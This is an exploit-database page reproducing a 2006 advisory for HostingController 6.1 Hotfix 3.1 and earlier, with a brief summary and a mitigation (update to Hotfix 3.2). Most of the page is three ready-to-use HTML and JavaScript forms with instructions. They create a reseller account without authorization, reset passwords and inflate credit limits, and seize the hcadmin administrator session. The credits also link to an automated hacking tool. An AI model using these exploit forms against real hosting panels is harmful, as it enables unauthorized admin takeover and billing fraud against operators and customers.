header-logo
Suggest Exploit
vendor:
HostingController 6.1 Hotfix <= 3.1
by:
Unknown
8,8
CVSS
HIGH
Code Injection
94
CWE
Product Name: HostingController 6.1 Hotfix <= 3.1
Affected Version From: 6.1 Hotfix <= 3.1
Affected Version To: 6.1 Hotfix <= 3.1
Patch Exists: YES
Related CWE: N/A
CPE: hostingcontroller.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

An attacker can gain reseller privileges and after that can gain admin privileges

An attacker can gain reseller privileges and after that can gain admin privileges by exploiting a bug in the hosting/addreseller.asp file of HostingController 6.1 Hotfix <= 3.1. The bug allows an attacker to inject malicious code into the file, which can be used to gain access to the system. The attacker can then use the code to gain access to the system and gain admin privileges.

Mitigation:

Update to Hotfix 3.2
Source

Exploit-DB raw data:

Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------

<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================

-------------------------------------------------------------------------------------

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from: 
	Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
	Small.Mouse from Shabgard.org  (small.mouse[4t]yahoo[d0t]com)
	Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
	http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
	http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]

Navigation

Suggest Exploit

Services By CQR